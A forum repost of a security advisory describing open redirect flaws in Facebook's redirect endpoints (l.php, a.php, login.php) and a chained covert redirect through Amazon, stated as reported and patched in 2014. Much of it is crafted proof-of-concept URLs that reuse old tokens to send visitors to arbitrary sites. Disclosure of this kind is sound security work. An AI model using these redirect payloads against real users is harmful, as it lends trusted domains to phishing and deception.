Jump to content
Aerosol

Facebook Open Redirect Old & New

Recommended Posts

Posted (edited)

*Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A
New Open Redirect Security Vulnerability*



*Domain:*
http://www.facebook.com



*Discover:*
Wang Jing, School of Physical and Mathematical Sciences (SPMS), Nanyang
Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/




*(1) General Vulnerabilities Description:*


*(1.1)* Two Facebook vulnerabilities are introduced in this article.
Facebook has a security problem. It can be exploited by Open Redirect
attacks. Since Facebook is trusted by large numbers of other websites.
Those vulnerabilities can be used to do "Covert Redirect" to other websites
such as Amazon, eBay, etc.


*(1.1.1)*
One Facebook Open Redirect vulnerability was reported to Facebook. Facebook
adopted a new mechanism to patch it. Though the reported URL redirection
vulnerabilities are patched. However, all old generated URLs are still
vulnerable to the attacks. Section (2) gives detail of it.

The reason may be related to Facebook's third-party interaction system or
database management system or both. Another reason may be related to
Facebook's design for different kind of browsers.


*(1.1.2)*
Another new Open Redirect vulnerability related to Facebook is introduced,
too. For reference, please read section (3).

Tests were performed on Firefox (version 26.0) on windows 7; Firefox
(version 24.0) on Ubuntu 12.10, Chrome (Version 30.0.1599.114) on Ubuntu
12.10.



*(1.2) Facebook's URL Redirection System Related to "*.php" Files*

All URLs' redirection are based on several files, such l.php, a.php,
landing.php and so on.

The main redirection are based on file "l.php".

For file "l.php", one parameter "h" is used for authentication. When it
mentions to file "a.php", parameter "eid" is used for authentication. All
those two files use parameter "u" for the url redirected to. In some other
files such as "landing.php", parameters such as "url", "next" are used.

<1>For parameter "h", two forms of authentication are used.
<a>h=HAQHyinFq
<b>h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA
<2>For parameter "eid", one form of authentication is used.

<a>eid=AQLP8sRq6lbU0jz0lARx9A9uetB6FIF1N2-Yjj_ePj0d_ezubjstZeDo6qDsalKVJwy6uDb_hQ-9tBsA2dVoQRq0lniOu0os_gPe3gY5l8lYblhQSwBtdvgjXjNqa xLZMYoasr3vv46tFsh1fL7q4kjT2LFw52dnJWd4SE8qc0YuPWf gPeQywgM2wl0CoW-lftWkr2dX0dLcytyHjXnvhKfVS_pQBllszUzsPENxE6EuZ-53Lh188o56idnfyyk2L58pE7C94PF-za4ZVB0qbuA2EnPcSJI-7oIiIJmIhifHe0CYTzG512-Z_heN44VlyJHevhS9auAR8-lFCAIlYymnT_Qiwp92RxjNOfBypBvszQUrvB6PH3fANn1prfMB Vm4RD_GFel14KVDS5USswbTOTkL3sZNhHUqqPHwBwU3JFePMMu wsfesigH85B_AxCsXUIWN7klKGSq8bPPsKSHttsa9hkkMpSfRK L7D_xwW4dU2xlmfGWil7jYRJmwfbOeF0zujk1FRBuM757tbfFM av-J-K9npbdrDrCuUVqV__Tf7CGZ89nPl-M2d09pE9enJj0OBXOaSXZX16LKaYnv1Wh4GKme7C-EOunITxyQtp1zy-48Uaz9mxO2x4bw7sBDfzDStF_Al8_0SMjWNTh-J38rBHAgT96X-dPFI43HU3x3fVymE9szrclBpvTaSfYezatgMzf77s3lQrQAMSl wSSRIzRuoFvQBmWKT0T5ZFgH5ykhYKhNMiKj577UO5g2Ojm-_-KKF4N_DBuG5R-I6EOSlhok2xUkpKVDnDcxZFTLxGmx5xc56J5kZLjJ96wnF2fH0 9Q19Qc2aU3xYFlEFrKjrlLpwGyOyCDx7_z7y1O4Efqew3Fa0Cb 9s6Kk2jpLF5XEIaYzzXOLAffxXG6icBJVovb9RPmiZ5s9dKYYo tLol68_X04O05bEvVccPEh-IQwX_VTMt3f23be2MECEq
R2l1A1ZkJx4qP00GI1pZhU_CXAnjSaTNmtaINRUeSsLNEZZsPw pWJMfeeGSwuof9krC05eSWjO0jH9tua0KteMYhj8i-3dwSBp4f7nMcFwH5ltfCLhMCYNB8rxgzcAczyhLIo2UY-3FSaJXBZ0lvuZBvnj7myUnyc2lCcy-fWh93MRRaJrrinjtfr9fDSMHM9Cja5xi0eG3Vs0aClnWbeJZA7 9TvmYt7E53HfwGuv5-EJOqRh3cwZF-53uPHA73ikUk3xTApjQunJM4uIBhpy7iBIgn_OXXo3X03YUJtJ cDuC20ocJbZ310VHliox5tYZF2oiMaOfgo9Y9KeqgsrJgwPCJe if4aB0Ne4g_oM_Tuqt2pXbdgoCawHIApF087eFKJqejp0jpEkJ erXPyK-IqsD_SQfIm_2WJSkzwzATwQKs




*(2) Vulnerability Description 1:*

*(2.1) *A security researcher reported two Open Redirect vulnerabilities to
Facebook in 2013. The following are the two links reported.

http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E
http://facebook.com/campaign/landing.php?url=http://www.adcash.com


Though a new mechanism was adopted. However, all old generated redirections
still work by parameter "h" and "eid".


*(2.2)* A website was used for the following tests. The website is "
http://www.tetraph.com/". Suppose this website is malicious.


*(2.2.1)*
<1>First test
<a>file: "l.php"
<b>URL parameter: "u"
<c>authentication parameter: "h"
<d>form: "h=HAQHyinFq".
<e>The authentication has no relation with all other parameters, such as
"s".

Examples:


*URL 1:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1

*Redirect Forbidden:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1

*Redirect Works:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1


*URL 2:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1

*Redirect Forbidden:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1

*Redirect Works:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1



*(2.2.2)*
<2>Second test. It is the same situation as above.
<a>file: "l.php",
<b>url parameter "u"
<c>authentication parameter: "h"
<d>form: "h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA".
<e>The authentication has no relation to all other parameters, such as
"env", "s".

Examples:


*URL 1:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1

*Redirect Forbidden:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1

*Redirect Works:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEe HCe_rdQ&s=1
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw


*URL 2:*
http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3 DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui 6nWmRBqQDoZE0cVww6&s=1

*Redirect Forbidden:*
http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwp lx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1

*Redirect Works:*
http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui 6nWmRBqQDoZE0cVww6&s=1




*(3) Facebook File "a.php" Open Redirect Security Vulnerability*

*(3.1)*
<a>file: "a.php"
<b>parameter "u"
<c> authentication parameter: "eid"
<d> form:
"eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w".
<e>The authentication has no relation to all other parameters, such as
"mac", "_tn_".

Examples:


*Vulnerable URL:*
https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F %252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%25 3Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D878 2431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER% 257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCu D-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8 AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAk inLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgU Y6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w

*POC:*
https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w
https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.xhamster.com&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w




*(3.2) Facebook Login Page Covert Redirect Security Vulnerability*

*Vulnerable URL Related to Login.php Based on a.php:*
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa. php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fope nhouse2014%252F%253Futm_source%253Dfacebook%2526ut m_medium%253Dcpc%2526utm_campaign%253Dopenhouse201 4%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid %3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzRO StFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lW HDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJ tC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr 5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3 iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx 9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9 c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1 v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt j5
smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon4 1VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp169 5OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4 OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8 QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G 1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs

*POC:*
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa. php%3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com %26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid% 3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROS tFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWH DJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJt C71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5 GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3i wusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx 9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9 c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1 v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFo n41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1 695
OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4 OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8 QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G 1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs




*(4) Amazon Covert Redirect Security Vulnerability Based on Facebook *

Since Facebook is trusted by large numbers of other websites. Those
vulnerabilities can be used to do "Covert Redirect" to other websites such
as Amazon.

The vulnerability exists at "redirect.html?" page with "&location"
parameter, e.g.
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCe YDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1


*More Details:*
http://tetraph.com/covert_redirect/
http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html


*(4.1)*
When a user is redirected from Amazon to another site, Amazon will check
parameters "&token". If the redirected URL's domain is OK, Amazon will
allow the reidrection.

However, if the URLs in a redirected domain have open URL redirection
vulnerabilities themselves, a user could be redirected from Amazon to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Amazon directly.

One of the vulnerable domain is,
http://www.facebook.com


*(4.2) *
Use one of webpages for the following tests. The webpage address is "
http://www.inzeed.com/kaleidoscope". Suppose it is malicious.


*Vulnerable URL:*
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3F v%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

*POC:*
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCe YDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.nicovideo.jp%26h%3D7AQFw CeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeY DAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu %3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_ AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww. facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww. pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_nd x4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051

https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww. facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww. naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4 h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051

https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww. facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww. craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj _ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051



*POC Video:*
https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be
https://www.youtube.com/watch?v=f4W63YXnbIk

*Blog Details:*
http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html





Those vulnerabilities were reported to Facebook in 2014 and they have been
patched.




*POC Video:*
https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be


*Blog Details:*
http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html




--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

&

Source

Edited by Aerosol

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...